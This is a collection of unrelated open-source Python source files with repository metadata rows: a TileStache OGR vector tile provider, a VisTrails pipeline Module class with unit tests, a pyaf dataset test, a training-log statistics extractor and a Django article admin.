xspan, yspan = xmax - xmin, ymax - ymin
perimeter = [
(xmin, ymin),
(xmin + 1 * xspan/4, ymin),
(xmin + 2 * xspan/4, ymin),
(xmin + 3 * xspan/4, ymin),
(xmax, ymin),
(xmax, ymin + 1 * yspan/4),
(xmax, ymin + 2 * yspan/4),
(xmax, ymin + 3 * yspan/4),
(xmax, ymax),
(xmax - 1 * xspan/4, ymax),
(xmax - 2 * xspan/4, ymax),
(xmax - 3 * xspan/4, ymax),
(xmin, ymax),
(xmin, ymax - 1 * yspan/4),
(xmin, ymax - 2 * yspan/4),
(xmin, ymax - 3 * yspan/4),
(xmin, ymin)
]
return perimeter
def _tile_perimeter_width(coord, projection):
""" Get the width in projected coordinates of the coordinate tile polygon.
Uses _tile_perimeter().
"""
perimeter = _tile_perimeter(coord, projection, False)
return perimeter[8][0] - perimeter[0][0]
def _tile_perimeter_geom(coord, projection, padded):
""" Get an OGR Geometry object for a coordinate tile polygon.
Uses _tile_perimeter().
"""
perimeter = _tile_perimeter(coord, projection, padded)
wkt = 'POLYGON((%s))' % ', '.join(['%.3f %.3f' % xy for xy in perimeter])
geom = ogr.CreateGeometryFromWkt(wkt)
ref = osr.SpatialReference()
ref.ImportFromProj4(projection.srs)
geom.AssignSpatialReference(ref)
return geom
def _feature_properties(feature, layer_definition, whitelist=None):
""" Returns a dictionary of feature properties for a feature in a layer.
Third argument is an optional list or dictionary of properties to
whitelist by case-sensitive name - leave it None to include everything.
A dictionary will cause property names to be re-mapped.
OGR property types:
OFTInteger (0), OFTIntegerList (1), OFTReal (2), OFTRealList (3),
OFTString (4), OFTStringList (5), OFTWideString (6), OFTWideStringList (7),
OFTBinary (8), OFTDate (9), OFTTime (10), OFTDateTime (11).
"""
properties = {}
okay_types = ogr.OFTInteger, ogr.OFTReal, ogr.OFTString, ogr.OFTWideString
for index in range(layer_definition.GetFieldCount()):
field_definition = layer_definition.GetFieldDefn(index)
field_type = field_definition.GetType()
if field_type not in okay_types:
try:
name = [oft for oft in dir(ogr) if oft.startswith('OFT') and getattr(ogr, oft) == field_type][0]
except IndexError:
raise KnownUnknown("Found an OGR field type I've never even seen: %d" % field_type)
else:
raise KnownUnknown("Found an OGR field type I don't know what to do with: ogr.%s" % name)
name = field_definition.GetNameRef()
if type(whitelist) in (list, dict) and name not in whitelist:
continue
property = type(whitelist) is dict and whitelist[name] or name
properties[property] = feature.GetField(name)
return properties
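# Illustrative sketch of the two whitelist forms accepted above (the field
# names and values are hypothetical):
#
#   _feature_properties(feature, defn, ['NAME', 'HIGHWAY'])
#       -> {'NAME': 'Broadway', 'HIGHWAY': 'residential'}
#   _feature_properties(feature, defn, {'NAME': 'name'})
#       -> {'name': 'Broadway'}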
def _append_with_delim(s, delim, data, key):
if key in data:
return s + delim + str(data[key])
else:
return s
def _open_layer(driver_name, parameters, dirpath):
""" Open a layer, return it and its datasource.
Dirpath comes from configuration, and is used to locate files.
"""
#
# Set up the driver
#
okay_drivers = {'postgis': 'PostgreSQL', 'esri shapefile': 'ESRI Shapefile',
'postgresql': 'PostgreSQL', 'shapefile': 'ESRI Shapefile',
'geojson': 'GeoJSON', 'spatialite': 'SQLite', 'oracle': 'OCI', 'mysql': 'MySQL'}
if driver_name.lower() not in okay_drivers:
raise KnownUnknown('Got a driver type Vector doesn\'t understand: "%s". Need one of %s.' % (driver_name, ', '.join(okay_drivers.keys())))
driver_name = okay_drivers[driver_name.lower()]
driver = ogr.GetDriverByName(str(driver_name))
#
# Set up the datasource
#
if driver_name == 'PostgreSQL':
if 'dbname' not in parameters:
raise KnownUnknown('Need at least a "dbname" parameter for postgis')
conn_parts = []
for part in ('dbname', 'user', 'host', 'password', 'port'):
if part in parameters:
conn_parts.append("%s='%s'" % (part, parameters[part]))
source_name = 'PG:' + ' '.join(conn_parts)
elif driver_name == 'MySQL':
if 'dbname' not in parameters:
raise KnownUnknown('Need a "dbname" parameter for MySQL')
if 'table' not in parameters:
raise KnownUnknown('Need a "table" parameter for MySQL')
conn_parts = []
for part in ('host', 'port', 'user', 'password'):
if part in parameters:
conn_parts.append("%s=%s" % (part, parameters[part]))
source_name = 'MySql:' + parameters["dbname"] + "," + ','.join(conn_parts) + ",tables=" + parameters['table']
elif driver_name == 'OCI':
if 'host' not in parameters:
raise KnownUnknown('Need a "host" parameter for oracle')
if 'table' not in parameters:
raise KnownUnknown('Need a "table" parameter for oracle')
source_name = 'OCI:'
source_name = _append_with_delim(source_name, '', parameters, 'user')
source_name = _append_with_delim(source_name, '/', parameters, 'password')
if 'user' in parameters:
source_name = source_name + '@'
source_name = source_name + parameters['host']
source_name = _append_with_delim(source_name, ':', parameters, 'port')
source_name = _append_with_delim(source_name, '/', parameters, 'dbname')
source_name = source_name + ":" + parameters['table']
elif driver_name in ('ESRI Shapefile', 'GeoJSON', 'SQLite'):
if 'file' not in parameters:
raise KnownUnknown('Need at least a "file" parameter for a shapefile')
file_href = urljoin(dirpath, parameters['file'])
scheme, h, file_path, q, p, f = urlparse(file_href)
if scheme not in ('file', ''):
raise KnownUnknown('Shapefiles need to be local, not %s' % file_href)
source_name = file_path
datasource = driver.Open(str(source_name))
if datasource is None:
raise KnownUnknown('Couldn\'t open datasource %s' % source_name)
#
# Set up the layer
#
if driver_name == 'PostgreSQL' or driver_name == 'OCI' or driver_name == 'MySQL':
if 'query' in parameters:
layer = datasource.ExecuteSQL(str(parameters['query']))
elif 'table' in parameters:
layer = datasource.GetLayerByName(str(parameters['table']))
else:
raise KnownUnknown('Need at least a "query" or "table" parameter for postgis or oracle')
elif driver_name == 'SQLite':
layer = datasource.GetLayerByName(str(parameters['layer']))
else:
layer = datasource.GetLayer(0)
if layer.GetSpatialRef() is None and driver_name != 'SQLite':
raise KnownUnknown('Couldn\'t get a layer from data source %s' % source_name)
#
# Return the layer and the datasource.
#
# Technically, the datasource is no longer needed
# but layer segfaults when it falls out of scope.
#
return layer, datasource
def _get_features(coord, properties, projection, layer, clipped, projected, spacing, id_property):
""" Return a list of features in an OGR layer with properties in GeoJSON form.
Optionally clip features to coordinate bounding box, and optionally
limit returned features to only those separated by number of pixels
given as spacing.
"""
#
# Prepare output spatial reference - always WGS84.
#
if projected:
output_sref = osr.SpatialReference()
output_sref.ImportFromProj4(projection.srs)
else:
output_sref = _sref_4326()
#
# Load layer information
#
definition = layer.GetLayerDefn()
layer_sref = layer.GetSpatialRef()
    if layer_sref is None:
layer_sref = _sref_4326()
#
# Spatially filter the layer
#
bbox = _tile_perimeter_geom(coord, projection, clipped == 'padded')
bbox.TransformTo(layer_sref)
layer.SetSpatialFilter(bbox)
features = []
mask = None
if spacing is not None:
buffer = spacing * _tile_perimeter_width(coord, projection) / 256.
for feature in layer:
geometry = feature.geometry().Clone()
if not geometry.Intersect(bbox):
continue
if mask and geometry.Intersect(mask):
continue
if clipped:
geometry = geometry.Intersection(bbox)
if geometry is None:
# may indicate a TopologyException
continue
# mask out subsequent features if spacing is defined
if mask and buffer:
mask = geometry.Buffer(buffer, 2).Union(mask)
elif spacing is not None:
mask = geometry.Buffer(buffer, 2)
geometry.AssignSpatialReference(layer_sref)
geometry.TransformTo(output_sref)
geom = json_loads(geometry.ExportToJson())
prop = _feature_properties(feature, definition, properties)
geojson_feature = {'type': 'Feature', 'properties': prop, 'geometry': geom}
if id_property != None and id_property in prop:
geojson_feature['id'] = prop[id_property]
features.append(geojson_feature)
return features
class Provider:
""" Vector Provider for OGR datasources.
See module documentation for explanation of constructor arguments.
"""
def __init__(self, layer, driver, parameters, clipped, verbose, projected, spacing, properties, precision, id_property):
self.layer = layer
self.driver = driver
self.clipped = clipped
self.verbose = verbose
self.projected = projected
self.spacing = spacing
self.parameters = parameters
self.properties = properties
self.precision = precision
self.id_property = id_property
def renderTile(self, width, height, srs, coord):
""" Render a single tile, return a VectorResponse instance.
"""
layer, ds = _open_layer(self.driver, self.parameters, self.layer.config.dirpath)
features = _get_features(coord, self.properties, self.layer.projection, layer, self.clipped, self.projected, self.spacing, self.id_property)
response = {'type': 'FeatureCollection', 'features': features}
if self.projected:
sref = osr.SpatialReference()
sref.ImportFromProj4(self.layer.projection.srs)
response['crs'] = {'wkt': sref.ExportToWkt()}
if srs == getProjectionByName('spherical mercator').srs:
response['crs']['wkid'] = 102113
else:
response['crs'] = {'srid': 4326, 'wkid': 4326}
return VectorResponse(response, self.verbose, self.precision)
def getTypeByExtension(self, extension):
""" Get mime-type and format by file extension.
This only accepts "geojson" for the time being.
"""
if extension.lower() == 'geojson':
return 'text/json', 'GeoJSON'
elif extension.lower() == 'arcjson':
return 'text/json', 'ArcJSON'
elif extension.lower() == 'geobson':
return 'application/x-bson', 'GeoBSON'
elif extension.lower() == 'arcbson':
return 'application/x-bson', 'ArcBSON'
elif extension.lower() == 'geoamf':
return 'application/x-amf', 'GeoAMF'
elif extension.lower() == 'arcamf':
return 'application/x-amf', 'ArcAMF'
elif extension.lower() == 'wkt':
return 'text/x-wkt', 'WKT'
raise KnownUnknown('Vector Provider only makes .geojson, .arcjson, .geobson, .arcbson, .geoamf, .arcamf and .wkt tiles, not "%s"' % extension)
| mpuig/TileStache | TileStache/Vector/__init__.py | Python | bsd-3-clause | 22,199 |
###############################################################################
##
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: [email protected]
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
# Check for testing
""" This module defines the class Module
"""
import copy
from itertools import izip
import weakref
from db.domain import DBModule
from core.data_structures.point import Point
from core.vistrail.annotation import Annotation
from core.vistrail.location import Location
from core.vistrail.module_function import ModuleFunction
from core.vistrail.module_param import ModuleParam
from core.vistrail.port import Port, PortEndPoint
from core.vistrail.port_spec import PortSpec
from core.utils import NoSummon, VistrailsInternalError, report_stack
from core.modules.module_descriptor import OverloadedPort
from core.modules.module_registry import get_module_registry, ModuleRegistry
################################################################################
# A Module stores not only the information, but a method (summon) that
# creates a 'live' object, subclass of core/modules/vistrail_module/Module
class Module(DBModule):
""" Represents a module from a Pipeline """
##########################################################################
# Constructor and copy
def __init__(self, *args, **kwargs):
DBModule.__init__(self, *args, **kwargs)
if self.cache is None:
self.cache = 1
if self.id is None:
self.id = -1
if self.location is None:
self.location = Location(x=-1.0, y=-1.0)
if self.name is None:
self.name = ''
if self.package is None:
self.package = ''
if self.version is None:
self.version = ''
self.set_defaults()
def set_defaults(self, other=None):
if other is None:
self.portVisible = set()
self.visible_input_ports = set()
self.visible_output_ports = set()
self.connected_input_ports = {}
self.connected_output_ports = {}
self.is_valid = False
self.is_breakpoint = False
self.is_watched = False
self._descriptor_info = None
self._module_descriptor = None
else:
self.portVisible = copy.copy(other.portVisible)
self.visible_input_ports = copy.copy(other.visible_input_ports)
self.visible_output_ports = copy.copy(other.visible_output_ports)
self.connected_input_ports = copy.copy(other.connected_input_ports)
self.connected_output_ports = \
copy.copy(other.connected_output_ports)
self.is_valid = other.is_valid
self.is_breakpoint = other.is_breakpoint
self.is_watched = other.is_watched
self._descriptor_info = None
self._module_descriptor = other._module_descriptor
if not self.namespace:
self.namespace = None
self.function_idx = self.db_functions_id_index
self.setup_indices()
def setup_indices(self):
self._input_port_specs = []
self._output_port_specs = []
for port_spec in self.port_spec_list:
if port_spec.type == 'input':
self._input_port_specs.append(port_spec)
elif port_spec.type == 'output':
self._output_port_specs.append(port_spec)
def __copy__(self):
"""__copy__() -> Module - Returns a clone of itself"""
return Module.do_copy(self)
def do_copy(self, new_ids=False, id_scope=None, id_remap=None):
cp = DBModule.do_copy(self, new_ids, id_scope, id_remap)
cp.__class__ = Module
cp.set_defaults(self)
return cp
@staticmethod
def convert(_module):
if _module.__class__ == Module:
return
_module.__class__ = Module
for _port_spec in _module.db_portSpecs:
PortSpec.convert(_port_spec)
if _module.db_location:
Location.convert(_module.db_location)
for _function in _module.db_functions:
ModuleFunction.convert(_function)
for _annotation in _module.db_get_annotations():
Annotation.convert(_annotation)
_module.set_defaults()
##########################################################################
id = DBModule.db_id
cache = DBModule.db_cache
annotations = DBModule.db_annotations
location = DBModule.db_location
center = DBModule.db_location
name = DBModule.db_name
label = DBModule.db_name
namespace = DBModule.db_namespace
package = DBModule.db_package
version = DBModule.db_version
port_spec_list = DBModule.db_portSpecs
internal_version = ''
# type check this (list, hash)
def _get_functions(self):
self.db_functions.sort(key=lambda x: x.db_pos)
return self.db_functions
def _set_functions(self, functions):
# want to convert functions to hash...?
self.db_functions = functions
functions = property(_get_functions, _set_functions)
def add_function(self, function):
self.db_add_function(function)
def has_function_with_real_id(self, f_id):
return self.db_has_function_with_id(f_id)
def get_function_by_real_id(self, f_id):
return self.db_get_function_by_id(f_id)
def add_annotation(self, annotation):
self.db_add_annotation(annotation)
def delete_annotation(self, annotation):
self.db_delete_annotation(annotation)
def has_annotation_with_key(self, key):
return self.db_has_annotation_with_key(key)
def get_annotation_by_key(self, key):
return self.db_get_annotation_by_key(key)
def toggle_breakpoint(self):
self.is_breakpoint = not self.is_breakpoint
def toggle_watched(self):
self.is_watched = not self.is_watched
def _get_port_specs(self):
return self.db_portSpecs_id_index
port_specs = property(_get_port_specs)
def has_portSpec_with_name(self, name):
return self.db_has_portSpec_with_name(name)
def get_portSpec_by_name(self, name):
return self.db_get_portSpec_by_name(name)
def add_port_spec(self, spec):
DBModule.db_add_portSpec(self, spec)
if spec.type == 'input':
self._input_port_specs.append(spec)
elif spec.type == 'output':
self._output_port_specs.append(spec)
# override DBModule.db_add_portSpec so that _*_port_specs are updated
db_add_portSpec = add_port_spec
def delete_port_spec(self, spec):
if spec.type == 'input':
self._input_port_specs.remove(spec)
elif spec.type == 'output':
self._output_port_specs.remove(spec)
DBModule.db_delete_portSpec(self, spec)
# override DBModule.db_delete_portSpec so that _*_port_specs are updated
db_delete_portSpec = delete_port_spec
def _get_input_port_specs(self):
return sorted(self._input_port_specs,
key=lambda x: (x.sort_key, x.id))
input_port_specs = property(_get_input_port_specs)
def _get_output_port_specs(self):
return sorted(self._output_port_specs,
key=lambda x: (x.sort_key, x.id), reverse=True)
output_port_specs = property(_get_output_port_specs)
def _get_descriptor_info(self):
if self._descriptor_info is None:
self._descriptor_info = (self.package, self.name,
self.namespace, self.version,
str(self.internal_version))
return self._descriptor_info
descriptor_info = property(_get_descriptor_info)
def _get_module_descriptor(self):
if self._module_descriptor is None or \
self._module_descriptor() is None:
reg = get_module_registry()
self._module_descriptor = \
weakref.ref(reg.get_descriptor_by_name(*self.descriptor_info))
return self._module_descriptor()
def _set_module_descriptor(self, descriptor):
self._module_descriptor = weakref.ref(descriptor)
module_descriptor = property(_get_module_descriptor,
_set_module_descriptor)
def get_port_spec(self, port_name, port_type):
"""get_port_spec(port_name: str, port_type: str: ['input' | 'output'])
-> PortSpec
"""
if self.has_portSpec_with_name((port_name, port_type)):
return self.get_portSpec_by_name((port_name, port_type))
desc = self.module_descriptor
reg = get_module_registry()
return reg.get_port_spec_from_descriptor(desc, port_name, port_type)
def has_port_spec(self, port_name, port_type):
if self.has_portSpec_with_name((port_name, port_type)):
return True
reg = get_module_registry()
desc = self.module_descriptor
return reg.has_port_spec_from_descriptor(desc, port_name, port_type)
def summon(self):
result = self.module_descriptor.module()
if self.cache != 1:
result.is_cacheable = lambda *args: False
if hasattr(result, 'input_ports_order'):
result.input_ports_order = [p.name for p in self.input_port_specs]
if hasattr(result, 'output_ports_order'):
result.output_ports_order = [p.name for p in self.output_port_specs]
# output_ports are reversed for display purposes...
result.output_ports_order.reverse()
# FIXME this may not be quite right because we don't have self.registry
# anymore. That said, I'm not sure how self.registry would have
# worked for hybrids...
result.registry = get_module_registry()
return result
def is_group(self):
return False
def is_abstraction(self):
return False
def getNumFunctions(self):
"""getNumFunctions() -> int - Returns the number of functions """
return len(self.functions)
def sourcePorts(self):
"""sourcePorts() -> list of Port
Returns list of source (output) ports module supports.
"""
registry = get_module_registry()
desc = self.module_descriptor
ports = registry.module_source_ports_from_descriptor(True, desc)
ports.extend(self.output_port_specs)
return ports
def destinationPorts(self):
"""destinationPorts() -> list of Port
Returns list of destination (input) ports module supports
"""
registry = get_module_registry()
desc = self.module_descriptor
ports = registry.module_destination_ports_from_descriptor(True, desc)
ports.extend(self.input_port_specs)
return ports
##########################################################################
# Debugging
def show_comparison(self, other):
if type(other) != type(self):
print "Type mismatch"
print type(self), type(other)
elif self.id != other.id:
print "id mismatch"
print self.id, other.id
elif self.name != other.name:
print "name mismatch"
print self.name, other.name
elif self.cache != other.cache:
print "cache mismatch"
print self.cache, other.cache
elif self.location != other.location:
print "location mismatch"
# FIXME Location has no show_comparison
# self.location.show_comparison(other.location)
elif len(self.functions) != len(other.functions):
print "function length mismatch"
print len(self.functions), len(other.functions)
else:
for f, g in izip(self.functions, other.functions):
if f != g:
print "function mismatch"
f.show_comparison(g)
return
print "No difference found"
assert self == other
##########################################################################
# Operators
def __str__(self):
"""__str__() -> str Returns a string representation of itself. """
def get_name():
if self.namespace:
return self.namespace + '|' + self.name
return self.name
return ("(Module '%s:%s' id=%s functions:%s port_specs:%s)@%X" %
(self.package,
get_name(),
self.id,
[str(f) for f in self.functions],
[str(port_spec) for port_spec in self.db_portSpecs],
id(self)))
def __eq__(self, other):
""" __eq__(other: Module) -> boolean
Returns True if self and other have the same attributes. Used by ==
operator.
"""
if type(other) != type(self):
return False
if self.name != other.name:
return False
if self.namespace != other.namespace:
return False
if self.package != other.package:
return False
if self.cache != other.cache:
return False
if self.location != other.location:
return False
if len(self.functions) != len(other.functions):
return False
if len(self.annotations) != len(other.annotations):
return False
for f, g in izip(self.functions, other.functions):
if f != g:
return False
for f, g in izip(self.annotations, other.annotations):
if f != g:
return False
return True
def __ne__(self, other):
return not self.__eq__(other)
##########################################################################
# Properties
################################################################################
# Testing
import unittest
class TestModule(unittest.TestCase):
def create_module(self, id_scope=None):
from db.domain import IdScope
if id_scope is None:
id_scope = IdScope()
params = [ModuleParam(id=id_scope.getNewId(ModuleParam.vtType),
type='Int',
val='1')]
functions = [ModuleFunction(id=id_scope.getNewId(ModuleFunction.vtType),
name='value',
parameters=params)]
module = Module(id=id_scope.getNewId(Module.vtType),
name='Float',
package='edu.utah.sci.vistrails.basic',
functions=functions)
return module
def test_copy(self):
"""Check that copy works correctly"""
from db.domain import IdScope
id_scope = IdScope()
m1 = self.create_module(id_scope)
m2 = copy.copy(m1)
self.assertEquals(m1, m2)
self.assertEquals(m1.id, m2.id)
m3 = m1.do_copy(True, id_scope, {})
self.assertEquals(m1, m3)
self.assertNotEquals(m1.id, m3.id)
def test_serialization(self):
""" Check that serialize and unserialize are working properly """
import core.db.io
m1 = self.create_module()
xml_str = core.db.io.serialize(m1)
m2 = core.db.io.unserialize(xml_str, Module)
self.assertEquals(m1, m2)
self.assertEquals(m1.id, m2.id)
def testEq(self):
"""Check correctness of equality operator."""
x = Module()
self.assertNotEquals(x, None)
def testAccessors(self):
"""Check that accessors are working."""
x = Module()
self.assertEquals(x.id, -1)
x.id = 10
self.assertEquals(x.id, 10)
self.assertEquals(x.cache, 1)
x.cache = 1
self.assertEquals(x.cache, 1)
self.assertEquals(x.location.x, -1.0)
x.location = Location(x=1, y=x.location.y)
self.assertEquals(x.location.x, 1)
self.assertEquals(x.name, "")
def testSummonModule(self):
"""Check that summon creates a correct module"""
x = Module()
x.name = "String"
x.package = 'edu.utah.sci.vistrails.basic'
try:
registry = get_module_registry()
c = x.summon()
m = registry.get_descriptor_by_name('edu.utah.sci.vistrails.basic',
'String').module
assert type(c) == m
except NoSummon:
msg = "Expected to get a String object, got a NoSummon exception"
self.fail(msg)
def test_constructor(self):
m1_param = ModuleParam(val="1.2",
type="Float",
alias="",
)
m1_function = ModuleFunction(name="value",
parameters=[m1_param],
)
m1 = Module(id=0,
name='Float',
functions=[m1_function],
)
m2 = Module()
m2.name = "Float"
m2.id = 0
f = ModuleFunction()
f.name = "value"
m2.functions.append(f)
param = ModuleParam()
param.strValue = "1.2"
param.type = "Float"
param.alias = ""
f.params.append(param)
assert m1 == m2
def test_str(self):
m = Module(id=0,
name='Float',
functions=[ModuleFunction(name='value',
parameters=[ModuleParam(type='Int',
val='1',
)],
)],
)
str(m)
if __name__ == '__main__':
unittest.main()
| CMUSV-VisTrails/WorkflowRecommendation | vistrails/core/vistrail/module.py | Python | bsd-3-clause | 19,617 |
import pyaf.Bench.TS_datasets as tsds
import tests.artificial.process_artificial_dataset as art
art.process_dataset(N = 1024 , FREQ = 'D', seed = 0, trendtype = "ConstantTrend", cycle_length = 12, transform = "Difference", sigma = 0.0, exog_count = 20, ar_order = 0);
| antoinecarme/pyaf | tests/artificial/transf_Difference/trend_ConstantTrend/cycle_12/ar_/test_artificial_1024_Difference_ConstantTrend_12__20.py | Python | bsd-3-clause | 271 |
# by AnvaMiba
import sys
import cPickle
import numpy as np
def main():
if len(sys.argv) != 2:
usage()
outFs = open(sys.argv[1], 'wb')
i = 0
train_i_ce_acc = []
test_i_ce_acc = []
line = sys.stdin.readline()
while line:
tokens = line.split()
if (len(tokens)) > 0 and (tokens[0] == 'Iteration:'):
i = int(tokens[1])
line = sys.stdin.readline()
tokens = line.split()
if len(tokens) != 2:
break
ce = float(tokens[1])
line = sys.stdin.readline()
tokens = line.split()
if len(tokens) != 2:
break
acc = float(tokens[1])
train_i_ce_acc.append([i, ce, acc])
if (len(tokens)) > 0 and (tokens[0] == 'VALIDATION'):
line = sys.stdin.readline()
tokens = line.split()
if len(tokens) != 2:
break
ce = float(tokens[1])
line = sys.stdin.readline()
tokens = line.split()
if len(tokens) != 2:
break
acc = float(tokens[1])
test_i_ce_acc.append([i, ce, acc])
line = sys.stdin.readline()
rv_dict = {'train_i_ce_acc': np.array(train_i_ce_acc), 'test_i_ce_acc': np.array(test_i_ce_acc)}
cPickle.dump(rv_dict, outFs, cPickle.HIGHEST_PROTOCOL)
outFs.close()
def usage():
print >> sys.stderr, 'Usage:'
print >> sys.stderr, sys.argv[0], 'pickle_out_file'
sys.exit(-1)
if __name__ == '__main__':
main()
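# Hedged consumer sketch (the file name is illustrative): the pickle written
# by main() holds two arrays of (iteration, cross-entropy, accuracy) rows.
#
#   import cPickle
#   with open('stats.pkl', 'rb') as f:
#       stats = cPickle.load(f)
#   train = stats['train_i_ce_acc']  # columns: iteration, CE, accuracy
#   test = stats['test_i_ce_acc']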
| Avmb/lowrank-gru | mnist_extract_stats_from_log.py | Python | bsd-3-clause | 1,282 |
# -*- coding: utf-8 -*-
from django.conf import settings as django_settings
from django.contrib import admin
from django.db import models
from django.http import HttpResponseRedirect
from django.utils.translation import ugettext, ugettext_lazy as _
from article.models import Article
from article.forms import ArticleAdminForm
# The names below are assumed to use their upstream FeinCMS import paths;
# this admin borrows heavily from the FeinCMS PageAdmin, which relies on
# ensure_completely_loaded, the editor/item_editor helpers and Page.
from feincms import ensure_completely_loaded
from feincms.admin import editor, item_editor
from feincms.admin.editor import ItemEditor, TreeEditor
from feincms.module.page.models import Page
class ArticleAdmin(ItemEditor, TreeEditor):
"""
Article Control Panel in Admin
"""
class Media:
css = {}
js = []
form = ArticleAdminForm
# the fieldsets config here is used for the add_view, it has no effect
# for the change_view which is completely customized anyway
unknown_fields = ['override_url', 'redirect_to']
fieldsets = [
(None, {
'fields': ['active', 'in_navigation', 'template_key', 'title', 'slug',
'parent'],
}),
item_editor.FEINCMS_CONTENT_FIELDSET,
(_('Other options'), {
'classes': ['collapse',],
'fields': unknown_fields,
}),
]
readonly_fields = []
list_display = ['short_title', 'is_visible_admin', 'in_navigation_toggle', 'template']
list_filter = ['active', 'in_navigation', 'template_key', 'parent']
search_fields = ['title', 'slug']
prepopulated_fields = { 'slug': ('title',), }
raw_id_fields = ['parent']
radio_fields = {'template_key': admin.HORIZONTAL}
def __init__(self, *args, **kwargs):
ensure_completely_loaded()
        if len(Article._feincms_templates) > 4:
            # Too many templates for radio buttons; fall back to the
            # default select widget.
            del self.radio_fields['template_key']
super(ArticleAdmin, self).__init__(*args, **kwargs)
# The use of fieldsets makes only fields explicitly listed in there
# actually appear in the admin form. However, extensions should not be
# aware that there is a fieldsets structure and even less modify it;
# we therefore enumerate all of the model's field and forcibly add them
# to the last section in the admin. That way, nobody is left behind.
from django.contrib.admin.util import flatten_fieldsets
present_fields = flatten_fieldsets(self.fieldsets)
for f in self.model._meta.fields:
if not f.name.startswith('_') and not f.name in ('id', 'lft', 'rght', 'tree_id', 'level') and \
not f.auto_created and not f.name in present_fields and f.editable:
self.unknown_fields.append(f.name)
if not f.editable:
self.readonly_fields.append(f.name)
in_navigation_toggle = editor.ajax_editable_boolean('in_navigation', _('in navigation'))
def _actions_column(self, page):
        actions = super(ArticleAdmin, self)._actions_column(page)
actions.insert(0, u'<a href="add/?parent=%s" title="%s"><img src="%simg/admin/icon_addlink.gif" alt="%s"></a>' % (
page.pk, _('Add child page'), django_settings.ADMIN_MEDIA_PREFIX ,_('Add child page')))
actions.insert(0, u'<a href="%s" title="%s"><img src="%simg/admin/selector-search.gif" alt="%s" /></a>' % (
page.get_absolute_url(), _('View on site'), django_settings.ADMIN_MEDIA_PREFIX, _('View on site')))
return actions
def add_view(self, request, form_url='', extra_context=None):
# Preserve GET parameters
        return super(ArticleAdmin, self).add_view(
request=request,
form_url=request.get_full_path(),
extra_context=extra_context)
def response_add(self, request, obj, *args, **kwargs):
        response = super(ArticleAdmin, self).response_add(request, obj, *args, **kwargs)
if 'parent' in request.GET and '_addanother' in request.POST and response.status_code in (301, 302):
# Preserve GET parameters if we are about to add another page
response['Location'] += '?parent=%s' % request.GET['parent']
if 'translation_of' in request.GET:
# Copy all contents
try:
original = self.model._tree_manager.get(pk=request.GET.get('translation_of'))
original = original.original_translation
obj.copy_content_from(original)
obj.save()
except self.model.DoesNotExist:
pass
return response
def _refresh_changelist_caches(self, *args, **kwargs):
self._visible_pages = list(self.model.objects.active().values_list('id', flat=True))
def change_view(self, request, object_id, extra_context=None):
from django.shortcuts import get_object_or_404
if 'create_copy' in request.GET:
page = get_object_or_404(Page, pk=object_id)
new = Page.objects.create_copy(page)
self.message_user(request, ugettext("You may edit the copied page below."))
return HttpResponseRedirect('../%s/' % new.pk)
elif 'replace' in request.GET:
page = get_object_or_404(Page, pk=request.GET.get('replace'))
with_page = get_object_or_404(Page, pk=object_id)
Page.objects.replace(page, with_page)
self.message_user(request, ugettext("You have replaced %s. You may continue editing the now-active page below.") % page)
return HttpResponseRedirect('.')
# Hack around a Django bug: raw_id_fields aren't validated correctly for
# ForeignKeys in 1.1: http://code.djangoproject.com/ticket/8746 details
# the problem - it was fixed for MultipleChoiceFields but not ModelChoiceField
# See http://code.djangoproject.com/ticket/9209
if hasattr(self, "raw_id_fields"):
for k in self.raw_id_fields:
if not k in request.POST:
continue
if not isinstance(getattr(Page, k).field, models.ForeignKey):
continue
v = request.POST[k]
if not v:
del request.POST[k]
continue
try:
request.POST[k] = int(v)
except ValueError:
request.POST[k] = None
        return super(ArticleAdmin, self).change_view(request, object_id, extra_context)
def render_item_editor(self, request, object, context):
if object:
try:
active = Page.objects.active().exclude(pk=object.pk).get(_cached_url=object._cached_url)
context['to_replace'] = active
except Page.DoesNotExist:
pass
        return super(ArticleAdmin, self).render_item_editor(request, object, context)
def is_visible_admin(self, page):
"""
Instead of just showing an on/off boolean, also indicate whether this
page is not visible because of publishing dates or inherited status.
"""
if not hasattr(self, "_visible_pages"):
self._visible_pages = list() # Sanity check in case this is not already defined
if page.parent_id and not page.parent_id in self._visible_pages:
# parent page's invisibility is inherited
if page.id in self._visible_pages:
self._visible_pages.remove(page.id)
return editor.ajax_editable_boolean_cell(page, 'active', override=False, text=_('inherited'))
if page.active and not page.id in self._visible_pages:
# is active but should not be shown, so visibility limited by extension: show a "not active"
return editor.ajax_editable_boolean_cell(page, 'active', override=False, text=_('extensions'))
return editor.ajax_editable_boolean_cell(page, 'active')
is_visible_admin.allow_tags = True
is_visible_admin.short_description = _('is active')
is_visible_admin.editable_boolean_field = 'active'
# active toggle needs more sophisticated result function
def is_visible_recursive(self, page):
retval = []
for c in page.get_descendants(include_self=True):
retval.append(self.is_visible_admin(c))
return retval
is_visible_admin.editable_boolean_result = is_visible_recursive
admin.site.register(Article, ArticleAdmin)
| indexofire/gravoicy | gravoicy/apps/article/admin.py | Python | bsd-3-clause | 7,978 |
from django import forms
